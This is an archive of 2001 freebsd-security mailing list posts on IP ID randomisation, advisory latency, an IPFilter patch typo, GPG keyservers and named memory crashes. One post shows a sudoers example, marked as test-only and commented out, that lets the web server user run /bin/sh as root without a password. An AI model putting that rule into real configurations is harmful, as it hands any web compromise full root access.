Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id BB1C637B424; Tue, 17 Apr 2001 14:20:46 -0700 (PDT) (envelope-from rsimmons@wlcg.com)
Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f3HLJbS92759; Tue, 17 Apr 2001 17:19:41 -0400 (EDT) (envelope-from rsimmons@wlcg.com)
Date: Tue, 17 Apr 2001 17:19:34 -0400 (EDT)
From: Rob Simmons
To: Matt Dillon
Cc: Kris Kennaway , Niels Provos , Wes Peters , , ,
Subject: Re: non-random IP IDs
In-Reply-To: <200104171731.f3HHVFu94944@earth.backplane.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

On Tue, 17 Apr 2001, Matt Dillon wrote:

> Let me put it another way: I think this sort of thing is an excellent
> example of introducing unnecessary kernel bloat into the system. Who
> gives a fart whether someone can port scan you efficiently or
> anonymously or not? I get port scanned every day. Most hackers don't
> even bother with portscans, they just try the exploit on the target
> machines directly.

You could add a kernel config variable in case someone wants a less bloated kernel.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE63LNpv8Bofna59hYRA/5RAKCIRJTLpcf8kZ7q86QeLrfUzWBM9gCgqhuO
GTxP1jwxVOgpsCpfGjx10js=
=Y/2k
-----END PGP SIGNATURE-----

From owner-freebsd-security Tue Apr 17 14:43:28 2001
Delivered-To: freebsd-security@freebsd.org
Received: from bluenugget.net (skin-flute.com [64.3.150.188]) by hub.freebsd.org (Postfix) with ESMTP id 5693037B423; Tue, 17 Apr 2001 14:43:22 -0700 (PDT) (envelope-from geniusj@bluenugget.net)
Received: from worsehalf (sf-gw.epylon.com [63.93.9.98]) by bluenugget.net (Postfix) with ESMTP id A81371367C; Tue, 17 Apr 2001 14:15:16 -0700 (PDT)
Message-ID: <004201c0c783$7fe71df0$4904a8c0@epylon.lan>
From: "Jason DiCioccio"
To: "Darren Reed" , "Alfred Perlstein"
Cc: ,
References: <200104172046.GAA04095@caligula.anu.edu.au>
Subject: Re: non-random IP IDs
Date: Tue, 17 Apr 2001 14:15:15 -0700
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2462.0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org
From: "Darren Reed"
Subject: Re: non-random IP IDs

> How long has your box been up ? How many changes to the system config
> have been made since then ? If you're not there, and it reboots, will
> it come up 100% functional ? Do your computers need some amount of
> preventative maintenance like internal cleaning to deal with dust build
> up, etc ?

I don't know very many if any people that take their machines off the rack just to clean dust out of the case.

> How many times do unscheduled reboots result in hardware not
> spinning back up and at an inconvenient time ?

This would happen regardless of when/if you rebooted it.

> Any non-trivial change to
> startup (or bootup) sequence should be tested and how do you do that
> without a reboot ?

I use /usr/local/etc/rc.d, so for me it would be 'blah.sh stop && blah.sh start..' If you use rc.local or rc.* usually running the necessary commands while system is up is a good determination on whether it'll work, or putting it in a separate shell script and running that is even better (to make sure that it doesn't go into interactive mode or anything). Not to mention again, this would happen whether you rebooted it right after you made them or whether you rebooted it 6 months from then.

> Else where is the egg when that "she'll be right mate"
> change fails at 9:00am on Monday morning and you've slept in ?

echo -n in your startup scripts works wonders :-)

>
> There is so much more to serious system admin (from your personal desktops
> to mainframes) than just applying (security) patches and keeping it running
> with no downtime.

Well, that is when you don't have hot-swap everything :)

>
> None of my personal boxes have uptimes that ever exceed 6 months, even my
> servers, but I have complete confidence in them rebooting and services being
> restarted (modulo file system damage from an unclean shutdown).
softupdates should take care of this, and as far as HD trouble, if your system is really that important then mirror your disks.

Cheers,
-JD-

From owner-freebsd-security Tue Apr 17 15:02:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from zork.punq.net (punq.net [207.154.84.94]) by hub.freebsd.org (Postfix) with SMTP id B361537B422 for ; Tue, 17 Apr 2001 15:02:22 -0700 (PDT) (envelope-from marcus@zork.punq.net)
Received: (qmail 3919 invoked by uid 1000); 17 Apr 2001 22:02:21 -0000
Date: Tue, 17 Apr 2001 15:02:21 -0700
From: Marcus Reid
To: Jonathan Slivko
Cc: freebsd-security@freebsd.org
Subject: Re: Latency of security notifications
Message-ID: <20010417150221.B3580@blazingdot.com>
References: <200104171717.AA1124598422@stmail.pace.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <200104171717.AA1124598422@stmail.pace.edu>; from js43064n@stmail.pace.edu on Tue, Apr 17, 2001 at 05:17:41PM -0400
Coffee-Level: high
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I saw the ftpd/glob() vulnerability on bugtraq yesterday, and the vulnerability report came out this afternoon. The ntpd vulnerability says Announced: 2001-04-06 but I got the report 2001-04-12. I think it's admirable that the reports come with patches and background, but I'd like to know to disable ntpd as soon as possible while waiting for details.

I'm sure there are good reasons that things are the way that they are. My question was not in the spirit of bashing it. I just thought that this forum might be a good place to ask about sources of timely security notifications.

On Tue, Apr 17, 2001 at 05:17:41PM -0400, Jonathan Slivko wrote:
> Such as?
>
> ---------- Original Message ----------------------------------
> From: Marcus Reid
> Date: Tue, 17 Apr 2001 14:13:41 -0700
>
> >Hi:
> >
> >When I joined the freebsd-security-notifications mailing list, I set it up
> >so that I got paged when an email came in from it, and forwarded the email
> >to my other mailboxes, thinking that it was the best source of early-warning
> >information possible. However there's been a couple of recent vulnerabilities
> >that I heard about from somewhere else first.
> >
> >What are the best sources for early-warning security notifications?
> >
> >--
> >Marcus Reid
> >Blazingdot.com
> >
> >To Unsubscribe: send mail to majordomo@FreeBSD.org
> >with "unsubscribe freebsd-security" in the body of the message
> >
>
> --
> ~~~~
> Jonathan M. Slivko
> Systems Administrator, DataSyrge Internet Services
> Global IRC Operator, AsylumNet IRC Network
> ~~~~
> --
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue Apr 17 16:44:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail2.insweb.com (mail2.insweb.com [204.254.158.36]) by hub.freebsd.org (Postfix) with ESMTP id EB3BB37B423 for ; Tue, 17 Apr 2001 16:44:13 -0700 (PDT) (envelope-from fbsd-secure@ursine.com)
Received: from ursine.com (dhcp-4-45-203.users.insweb.com [10.4.45.203]) by mail2.insweb.com (8.11.0/8.11.0) with ESMTP id f3HNi3T52238 for ; Tue, 17 Apr 2001 16:44:03 -0700 (PDT) (envelope-from fbsd-secure@ursine.com)
Message-ID: <3ADCD543.8AB7B426@ursine.com>
Date: Tue, 17 Apr 2001 16:44:03 -0700
From: Michael Bryan
X-Mailer: Mozilla 4.76 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security@FreeBSD.ORG
Subject: Re: Latency of security notifications
References: <200104171717.AA1124598422@stmail.pace.edu> <20010417150221.B3580@blazingdot.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Marcus Reid wrote:
>
> I saw the ftpd/glob() vulnerability on bugtraq yesterday, and the
> vulnerability report came out this afternoon. The ntpd vulnerability
> says Announced: 2001-04-06 but I got the report 2001-04-12. I think
> it's admirable that the reports come with patches and background, but
> I'd like to know to disable ntpd as soon as possible while waiting for
> details.

Yeah, this was mentioned in the (lengthy) recent threads about security notifications and binary patches. Bottom line, I think a -lot- of people would be happier if the FreeBSD SAs could go out as soon as possible after a security hole is disclosed publicly in some other forum, even if all they say is words to the effect of "Be aware that this security problem exists, here's a workaround (if any), and we'll be updating this advisory when official patch information is available."

That way people can get rapid notification of potential problems without having to read all of freebsd-security, and instead pick it up via -announce, presumably with pager notification if they so desire. Kris, what do you think about this?

And I realize that part of the delay for the recent advisories (ntpd, ipfilter, ftpd) was because Kris was out of town for two weeks. But when I heard that, I was surprised, as I didn't realize he had no "backup". In the future, I think it would be a good idea to try and have a second/backup person available who could send out at least the initial SA if Kris isn't available for that task, if at all possible.

From owner-freebsd-security Tue Apr 17 18:06:21 2001
Delivered-To: freebsd-security@freebsd.org
Received: from nisser.com (c0039.upc-c.chello.nl [212.187.0.39]) by hub.freebsd.org (Postfix) with ESMTP id D188437B424 for ; Tue, 17 Apr 2001 18:06:16 -0700 (PDT) (envelope-from roelof@nisser.com)
Received: from nisser.com (roelof [10.0.0.2]) by nisser.com (8.9.3/8.9.2) with ESMTP id DAA32881; Wed, 18 Apr 2001 03:05:51 +0200 (CEST) (envelope-from roelof@nisser.com)
Message-ID: <3ADCE86F.775F6440@nisser.com>
Date: Wed, 18 Apr 2001 03:05:51 +0200
From: Roelof Osinga
Organization: Nisser - Nr. 1 in Veiligheid
X-Mailer: Mozilla 4.77 [en] (Windows NT 5.0; U)
X-Accept-Language: en,pdf
MIME-Version: 1.0
To: Kris Kennaway
Cc: Tommy Forrest - KE4PYM , Chris Faulhaber , Igor Podlesny , Darren Reed , "freebsd-security@FreeBSD.ORG"
Subject: Re: URGENT: Serious bug in IPFilter (fwd)
References: <20010416085048.A66477@peitho.fxp.org> <200104162207.SAA10151@ns.shellworld.net> <20010416221732.A20245@xor.obsecurity.org>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Kris Kennaway wrote:
>
> ...
> > ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-01:33/ipfilter.patch
> > fetch: ipfilter.patch: File unavailable (e.g., file not found, no
> > access)
>
> There was a typo in the advisory; it should be SA-01:32

Will there be an updated advisory or will we have to make do? Either way is fine, it's just that the suspense is killing me ;)

Roelof

From owner-freebsd-security Tue Apr 17 18:14:28 2001
Delivered-To: freebsd-security@freebsd.org
Received: from nisser.com (c0039.upc-c.chello.nl [212.187.0.39]) by hub.freebsd.org (Postfix) with ESMTP id A460F37B43E for ; Tue, 17 Apr 2001 18:14:25 -0700 (PDT) (envelope-from roelof@nisser.com)
Received: from nisser.com (roelof [10.0.0.2]) by nisser.com (8.9.3/8.9.2) with ESMTP id DAA32903; Wed, 18 Apr 2001 03:14:13 +0200 (CEST) (envelope-from roelof@nisser.com)
Message-ID: <3ADCEA65.53BF8E3@nisser.com>
Date: Wed, 18 Apr 2001 03:14:13 +0200
From: Roelof Osinga
Organization: Nisser - Nr. 1 in Veiligheid
X-Mailer: Mozilla 4.77 [en] (Windows NT 5.0; U)
X-Accept-Language: en,pdf
MIME-Version: 1.0
To: anderson@centtech.com
Cc: lloyd@li5.org, "freebsd-security@freebsd.org"
Subject: Re: Add/Remove Users
References: <200104171545.f3HFjKq76155@mail.wsufftrust.org.uk> <3ADC56CF.D3498E5@centtech.com>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Eric Anderson wrote:
>
> You should check out the man page for sudo, since you can set the
> NOPASSWD option to not ask for passwords..

To smooth things over a demo:

#nobody ALL=(root) NOPASSWD: /usr/local/sbin/userdb, /bin/sh, \
#       /usr/local/sbin/userdbpw, /usr/local/sbin/makeuserdb

# WEBAPP may run VMAIL without password on NISSER hosts
WEBAPP NISSER = NOPASSWD:VMAIL

The former is explicit whereas the latter depends on having the various aliases defined. Suffice to say that the VMAIL alias does not include /bin/sh, that was for testing purposes only.

Roelof

PS these were some intermediary steps for a webapp that could change a virt.users virt.password, nobody being the user apache runs as.

From owner-freebsd-security Tue Apr 17 18:17:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-63-207-60-27.dsl.lsan03.pacbell.net [63.207.60.27]) by hub.freebsd.org (Postfix) with ESMTP id 4C47837B42C for ; Tue, 17 Apr 2001 18:17:12 -0700 (PDT) (envelope-from kris@obsecurity.org)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id EC12266B38; Tue, 17 Apr 2001 18:17:10 -0700 (PDT)
Date: Tue, 17 Apr 2001 18:17:10 -0700
From: Kris Kennaway
To: Michael Bryan
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Latency of security notifications
Message-ID: <20010417181710.A12757@xor.obsecurity.org>
References: <200104171717.AA1124598422@stmail.pace.edu> <20010417150221.B3580@blazingdot.com> <3ADCD543.8AB7B426@ursine.com>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="ibTvN161/egqYuK8"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <3ADCD543.8AB7B426@ursine.com>; from fbsd-secure@ursine.com on Tue, Apr 17, 2001 at 04:44:03PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

--ibTvN161/egqYuK8
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

On Tue, Apr 17, 2001 at 04:44:03PM -0700, Michael Bryan wrote:
> Bottom line, I think a -lot- of people would be happier if the
> FreeBSD SAs could go out as soon as possible after a security hole
> is disclosed publicly in some other forum, even if all they say is
> words to the effect of "Be aware that this security problem exists,
> here's a workaround (if any), and we'll be updating this advisory
> when official patch information is available."
>
> That way people can get rapid notification of potential problems
> without having to read all of freebsd-security, and instead pick it
> up via -announce, presumably with pager notification if they so
> desire. Kris, what do you think about this?

I think it would result in a flood of support questions about "how do I fix this?"/"What does this mean?" and end up causing the security officer team a lot more work if it came from us, even as some kind of unofficial statement (especially if it was a very brief statement, which it would have to be to get immediately released upon third party disclosure of a vulnerability, because none of us have enough free time to actively pre-empt whatever else we're doing to go and write something comprehensive).
Other people usually send copies of third party advisories to this forum for serious issues as soon as they're published (on bugtraq or wherever), and the community takes care of the interim support: that seems like a much better solution to me.

> And I realize that part of the delay for the recent advisories
> (ntpd, ipfilter, ftpd) was because Kris was out of town for two
> weeks. But when I heard that, I was surprised, as I didn't realize
> he had no "backup". In the future, I think it would be a good idea
> to try and have a second/backup person available who could send out
> at least the initial SA if Kris isn't available for that task, if at
> all possible.

There are a number of others who are part of the security officer team, and in fact the ntpd advisory was written and released by Chris Faulhaber during my absence; it just so happens that we're all going through a busy time right now with our daytime lives and so the latency of released advisories has increased recently. Hopefully that will improve.
Kris

--ibTvN161/egqYuK8
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE63OsWWry0BWjoQKURAgWqAKDLcewNomitLjlV3VvfOVQWBJzsqgCggP15
wuILBPRczbe8g9F4ItrQzQ0=
=0KjN
-----END PGP SIGNATURE-----

--ibTvN161/egqYuK8--

From owner-freebsd-security Tue Apr 17 19:15:00 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail2.insweb.com (mail2.insweb.com [204.254.158.36]) by hub.freebsd.org (Postfix) with ESMTP id E5C8C37B43C for ; Tue, 17 Apr 2001 19:14:56 -0700 (PDT) (envelope-from fbsd-security@ursine.com)
Received: from ursine.com (dhcp-4-45-203.users.insweb.com [10.4.45.203]) by mail2.insweb.com (8.11.0/8.11.0) with ESMTP id f3I2EsT53132 for ; Tue, 17 Apr 2001 19:14:56 -0700 (PDT) (envelope-from fbsd-security@ursine.com)
Message-ID: <3ADCF89E.14CD5D37@ursine.com>
Date: Tue, 17 Apr 2001 19:14:54 -0700
From: Michael Bryan
X-Mailer: Mozilla 4.76 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security@freebsd.org
Subject: Re: Latency of security notifications
References: <200104171717.AA1124598422@stmail.pace.edu> <20010417150221.B3580@blazingdot.com> <3ADCD543.8AB7B426@ursine.com> <20010417181710.A12757@xor.obsecurity.org>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Kris Kennaway wrote:
>
> I think it would result in a flood of support questions about "how do
> I fix this?"/"What does this mean?" and end up causing the security
> officer team a lot more work if it came from us, even as some kind of
> unofficial statement (especially if it was a very brief statement,
> which it would have to be to get immediately released upon third party
> disclosure of a vulnerability, because none of us have enough free
> time to actively pre-empt whatever else we're doing to go and write
> something comprehensive).
>
> Other people usually send copies of third party advisories to this
> forum for serious issues as soon as they're published (on bugtraq or
> wherever), and the community takes care of the interim support: that
> seems like a much better solution to me.

Except that there are definitely cases where that isn't adequate, judging from current and past complaints. Although I pick up the info from freebsd-security (and in a couple of cases was the person to forward it there in the first place), a lot of people just don't have the time to keep up with the discussion list, but would definitely keep up with the moderated announcement list. Even to the point of having that list forwarded to a pager for the fastest possible notification, which I think is an excellent idea. Nobody in their right mind would forward freebsd-security into a pager. At least not for very long.
;-)

I understand your concern about the flood of questions, but that already happens anyway, at least within the freebsd-security list. Maybe such a mini "early alert" advisory to freebsd-security-announce could be worded in such a way that it would encourage people to check out the unmoderated list for rapid on-the-fly support questions, until such time as an official advisory came out? Something like this (very rough cut):

    The FreeBSD security team has been notified of a problem
    with XYZ. An official security announcement will be forthcoming
    shortly with the recommended fixes. In the meantime, please
    subscribe to and read the freebsd-security mailing list for the
    latest news on this issue.

And then list the minimal information that can be included, such as the impact, the affected versions and any potential workarounds (to the best that they are understood at the time).

This would -hopefully- minimize any questions sent directly to the security team, with most of the traffic going to freebsd-security. (Which already happens anyway, so it shouldn't be a significant increase in volume.)

I really hope you seriously consider doing something like this.

From owner-freebsd-security Tue Apr 17 19:46:12 2001
Delivered-To: freebsd-security@freebsd.org
Received: from drugs.dv.isc.org (drugs.dv.isc.org [130.155.191.236]) by hub.freebsd.org (Postfix) with ESMTP id EB2C037B43F for ; Tue, 17 Apr 2001 19:46:07 -0700 (PDT) (envelope-from marka@nominum.com)
Received: from nominum.com (localhost.dv.isc.org [127.0.0.1]) by drugs.dv.isc.org (8.11.2/8.11.2) with ESMTP id f3I2jtT17721; Wed, 18 Apr 2001 12:45:57 +1000 (EST) (envelope-from marka@nominum.com)
Message-Id: <200104180245.f3I2jtT17721@drugs.dv.isc.org>
To: Michael Bryan
Cc: freebsd-security@freebsd.org
From: Mark.Andrews@nominum.com
Subject: Re: Latency of security notifications
In-reply-to: Your message of "Tue, 17 Apr 2001 19:14:54 MST." <3ADCF89E.14CD5D37@ursine.com>
Date: Wed, 18 Apr 2001 12:45:54 +1000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> The FreeBSD security team has been notified of a problem
> with XYZ. An official security announcement will be forthcoming
> shortly with the recommended fixes. In the meantime, please
> subscribe to and read the freebsd-security mailing list for the
> latest news on this issue.

This approach doesn't work. I was not on the freebsd-security list when the ntpd bugtraq message went out. I found it impossible to see the *recent* traffic on the list that I had missed.

This is not to say that it can't be made to work. Just that we are not at a stage where this is the correct response.

Mark
--
Mark Andrews, Nominum Inc.
1 Seymour St., Dundas Valley, NSW 2117, Australia
PHONE: +61 2 9871 4742                 INTERNET: Mark.Andrews@nominum.com

From owner-freebsd-security Tue Apr 17 21:21:06 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cowpie.acm.vt.edu (cowpie.acm.vt.edu [128.173.42.253]) by hub.freebsd.org (Postfix) with ESMTP id 86F3C37B422 for ; Tue, 17 Apr 2001 21:21:02 -0700 (PDT) (envelope-from dlacroix@cowpie.acm.vt.edu)
Received: (from dlacroix@localhost) by cowpie.acm.vt.edu (8.11.3/8.11.3) id f3I4KQW98885; Wed, 18 Apr 2001 00:20:26 -0400 (EDT) (envelope-from dlacroix)
From: David La Croix
Message-Id: <200104180420.f3I4KQW98885@cowpie.acm.vt.edu>
Subject: Re: Latency of security notifications
To: kris@obsecurity.org (Kris Kennaway)
Date: Tue, 17 Apr 2001 23:20:26 -0500 (CDT)
Cc: freebsd-security@freebsd.org
In-Reply-To: <20010417181710.A12757@xor.obsecurity.org> from "Kris Kennaway" at Apr 17, 2001 06:17:10 PM

On the topic of "early notification", how about adding a custom header (which any user active on the list and/or who had read the appropriate guidelines on posting could add to any appropriate "early-warning" alert type messages/SAs)? The custom header could be checked for by the mail filter, and used to separate out the announcements from the discussion.

I am not an expert on Majordomo (or other list management services), so I'm not sure if it's possible to stick an X-Freebsd-security: Alert header in there and have Majordomo send it on, but I think that might be the magic to help those who don't have time to filter through the messages, and don't want to miss an important advisory/warning. Perhaps only a Security Officer might have access to post with the new headers. (I haven't spent that much time thinking about it ... I'm on vacation. :)

Another thought might be to set up a second moderated mailing list -- which sets the reply-to address to be the normal list and shares the same subscription list as freebsd-security. (Then people could forward mails based on the addressee to their pagers/phones/911 mail folder.)

We could also have suggested usage for the "importance/priority" (sorry, can't think which it is) heading to bring into play when someone posts a broad warning such as "NTP has a buffer overflow exploit".
> On Tue, Apr 17, 2001 at 04:44:03PM -0700, Michael Bryan wrote:
>
> > Bottom line, I think a -lot- of people would be happier if the
> > FreeBSD SAs could go out as soon as possible after a security hole
> > is disclosed publicly in some other forum, even if all they say is
> > words to the effect of "Be aware that this security problem exists,
> > here's a workaround (if any), and we'll be updating this advisory
> > when official patch information is available."
> >
> > That way people can get rapid notification of potential problems
> > without having to read all of freebsd-security, and instead pick it
> > up via -announce, presumably with pager notification if they so
> > desire. Kris, what do you think about this?
>
> I think it would result in a flood of support questions about "how do
> I fix this?"/"What does this mean?" and end up causing the security
> officer team a lot more work if it came from us, even as some kind of
> unofficial statement (especially if it was a very brief statement,
> which it would have to be to get immediately released upon third party
> disclosure of a vulnerability, because none of us have enough free
> time to actively pre-empt whatever else we're doing to go and write
> something comprehensive).
>
> Other people usually send copies of third party advisories to this
> forum for serious issues as soon as they're published (on bugtraq or
> wherever), and the community takes care of the interim support: that
> seems like a much better solution to me.
>
> > And I realize that part of the delay for the recent advisories
> > (ntpd, ipfilter, ftpd) was because Kris was out of town for two
> > weeks. But when I heard that, I was surprised, as I didn't realize
> > he had no "backup". In the future, I think it would be a good idea
> > to try and have a second/backup person available who could send out
> > at least the initial SA if Kris isn't available for that task, if at
> > all possible.
>
> There are a number of others who are part of the security officer
> team, and in fact the ntpd advisory was written and released by Chris
> Faulhaber during my absence; it just so happens that we're all going
> through a busy time right now with our daytime lives and so the
> latency of released advisories has increased recently. Hopefully that
> will improve.
>
> Kris

From owner-freebsd-security Tue Apr 17 23:27:17 2001
From: "Rashid N. Achilov"
Reply-To: achilov@granch.ru
Organization: Granch Ltd.
To: Pete Fritchman, James Greenfield
Subject: Re: GPG and "Not enough random bytes available"
Date: Wed, 18 Apr 2001 13:26:01 +0700
Cc: freebsd-security@FreeBSD.ORG
References: <026a01c0c780$e4ab3260$4501a8c0@boubou> <20010417170303.D17908@databits.net>
In-Reply-To: <20010417170303.D17908@databits.net>
Message-Id: <01041813260105.00414@sentry.granch.com>

On Wednesday 18 April 2001 04:03, Pete Fritchman wrote:
> ++ 17/04/01 22:56 +0200 - James Greenfield:
> | Any attempt to generate a keypair results in a message to the effect of
> | "Not enough random bytes available".
>

You can also press keys on your keyboard like crazy and pull your mouse by its tail :-) until the key is generated.

--
With Best Regards.
Rashid N. Achilov (RNA1-RIPE), Web: http://granch.ru/~shelton
Granch Ltd. system administrator, e-mail: achilov@granch.ru
PGP: 83 CD E2 A7 37 4A D5 81 D6 D6 52 BF C9 2F 85 AF 97 BE CB 0A

From owner-freebsd-security Tue Apr 17 23:30: 9 2001
From: "Rashid N. Achilov"
Reply-To: achilov@granch.ru
Organization: Granch Ltd.
To: freebsd-security@freebsd.org
Subject: PGP public keys
Date: Wed, 18 Apr 2001 13:29:55 +0700
Message-Id: <01041813295506.00414@sentry.granch.com>

I have just installed GPG. As mentioned in the docs, I put my public key on my web page (the rest is under construction :-)) ). But where can I find public keys for other people? Is there any keyserver?

--
With Best Regards.
Rashid N. Achilov (RNA1-RIPE), Web: http://granch.ru/~shelton
Granch Ltd. system administrator, e-mail: achilov@granch.ru
PGP: 83 CD E2 A7 37 4A D5 81 D6 D6 52 BF C9 2F 85 AF 97 BE CB 0A

From owner-freebsd-security Tue Apr 17 23:36:53 2001
Date: Tue, 17 Apr 2001 23:36:26 -0700
From: Brooks Davis
To: achilov@granch.ru
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: PGP public keys
Message-ID: <20010417233626.A3839@Odin.AC.HMC.Edu>
References: <01041813295506.00414@sentry.granch.com>
In-Reply-To: <01041813295506.00414@sentry.granch.com>; from shelton@sentry.granch.ru on Wed, Apr 18, 2001 at 01:29:55PM +0700

On Wed, Apr 18, 2001 at 01:29:55PM +0700, Rashid N. Achilov wrote:
> I have just installed GPG. As mirrored in doc, I put my public key on my web
> page (rest is under construction :-)) ). But where can I find public keys for
> people? Is there any keyserver?

pgp.mit.edu is a good one. You should submit your key there.

-- Brooks

--
Any statement of the form "X is the one, true Y" is FALSE.
PGP fingerprint 655D 519C 26A7 82E7 2529 9BF0 5D8E 8BE9 F238 1AD4

From owner-freebsd-security Tue Apr 17 23:40:41 2001
Date: Wed, 18 Apr 2001 01:38:22 -0500
From: Will Andrews
To: achilov@granch.ru
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: PGP public keys
Message-ID: <20010418013822.Y5017@casimir.physics.purdue.edu>
Reply-To: Will Andrews
References: <01041813295506.00414@sentry.granch.com>
In-Reply-To: <01041813295506.00414@sentry.granch.com>; from shelton@sentry.granch.ru on Wed, Apr 18, 2001 at 01:29:55PM +0700

On Wed, Apr 18, 2001 at 01:29:55PM +0700, Rashid N. Achilov wrote:
> I have just installed GPG. As mirrored in doc, I put my public key on my web
> page (rest is under construction :-)) ). But where can I find public keys for
> people? Is there any keyserver?

Yes.

    gpg --keyserver pgp.mit.edu --send-keys yourkeyidhere

to send your key. Check out http://pgp.mit.edu/ to search for other keys. Also check out http://people.freebsd.org/~wollman/freebsd.keyring for developers' keyrings.

I wrote a script that updates all your public keys off pgp.mit.edu here: http://www.physics.purdue.edu/~will/update_keys. Note: this script only works with GnuPG.
Enjoy,
--
wca

From owner-freebsd-security Tue Apr 17 23:44: 7 2001
Date: Wed, 18 Apr 2001 01:43:54 -0500 (CDT)
From: "Landon C. Evans"
To: "Rashid N. Achilov"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: PGP public keys
In-Reply-To: <01041813295506.00414@sentry.granch.com>

There is good documentation at www.gnupg.org for sending your key off to one of the many keyservers. MIT has one I believe, and certserver.pgp.com is one I use.

Landon Evans

On Wed, 18 Apr 2001, Rashid N. Achilov wrote:
> I have just installed GPG. As mirrored in doc, I put my public key on my web
> page (rest is under construction :-)) ). But where can I find public keys for
> people? Is there any keyserver?
> --
> With Best Regards.
> Rashid N. Achilov (RNA1-RIPE), Web: http://granch.ru/~shelton
> Granch Ltd. system administrator, e-mail: achilov@granch.ru
> PGP: 83 CD E2 A7 37 4A D5 81 D6 D6 52 BF C9 2F 85 AF 97 BE CB 0A

From owner-freebsd-security Wed Apr 18 1:13: 0 2001
Message-Id: <5.0.0.25.1.20010418101726.00a22eb0@mail.netcologne.de>
Date: Wed, 18 Apr 2001 10:17:53 +0200
To: freebsd-security@FreeBSD.ORG
From: Emre Bastuz

auth 350c2c4e subscribe freebsd-security info@emre.de

--
Emre Bastuz info@emre.de http://emre.de
UIN: 561260 PGP Key ID: 0xEA0E2CA1

From owner-freebsd-security Wed Apr 18 3:55: 9 2001
Message-Id: <3ADD7286.00003D.39304@frodo.searchcanada.ca>
To: freebsd-security@freebsd.org
Subject: Odd Machine Crashes
From: "Michael Richards"
Date: Wed, 18 Apr 2001 06:55:02 -0400 (EDT)

Hi. I'm trying to figure out why my machine is crapping out every night. There are some odd messages coming from named and the machine is obviously running out of memory. Here is one of the named messages. I'm not 100% confident that this is my problem but it seems odd:

Apr 18 06:20:10 frodo named[43474]: ns_resp: TCP truncated: "29.115.254.207.in-addr.arpa" IN PTR from [207.254.115.2].53

Name: webterminator1.crystaltech.com
Address: 207.254.115.2

Hrm... Odd name for a machine.

I had problems with a perl script going wild and eating my 1Gb of memory and swap, but I've limited its resources after overcoming a nasty error. It turns out that if you have a space at the end of a line in login.conf, it will silently ignore the rest of the restrictions in your class!

Apr 17 22:03:14 frodo /kernel: pid 2192 (named), uid 0, was killed: out of swap space

I don't believe there is a problem with the version of named...

named 8.2.3-REL Sun Feb 18 11:47:44 EST 2001

I've since started limiting the resources of class daemon and running named under that user. I'm not sure if this is correct or if FreeBSD will even respect the class when a daemon is started as root.

bash-2.03# limits -C daemon
Resource limits for class daemon:
  cputime          infinity secs
  filesize         infinity kb
  datasize         infinity kb
  stacksize        infinity kb
  coredumpsize     infinity kb
  memoryuse          131072 kb
  memorylocked     infinity kb
  maxprocesses           64
  openfiles            1024
  sbsize           infinity bytes

If for some reason named goes berserk, this I believe should limit it to 128m of memory.
I also tried limiting user http with the following class:

Resource limits for class http:
  cputime          infinity secs
  filesize           819200 kb
  datasize            65536 kb
  stacksize           32768 kb
  coredumpsize         8192 kb
  memoryuse          131072 kb
  memorylocked        23552 kb
  maxprocesses          128
  openfiles            1024
  sbsize           infinity bytes

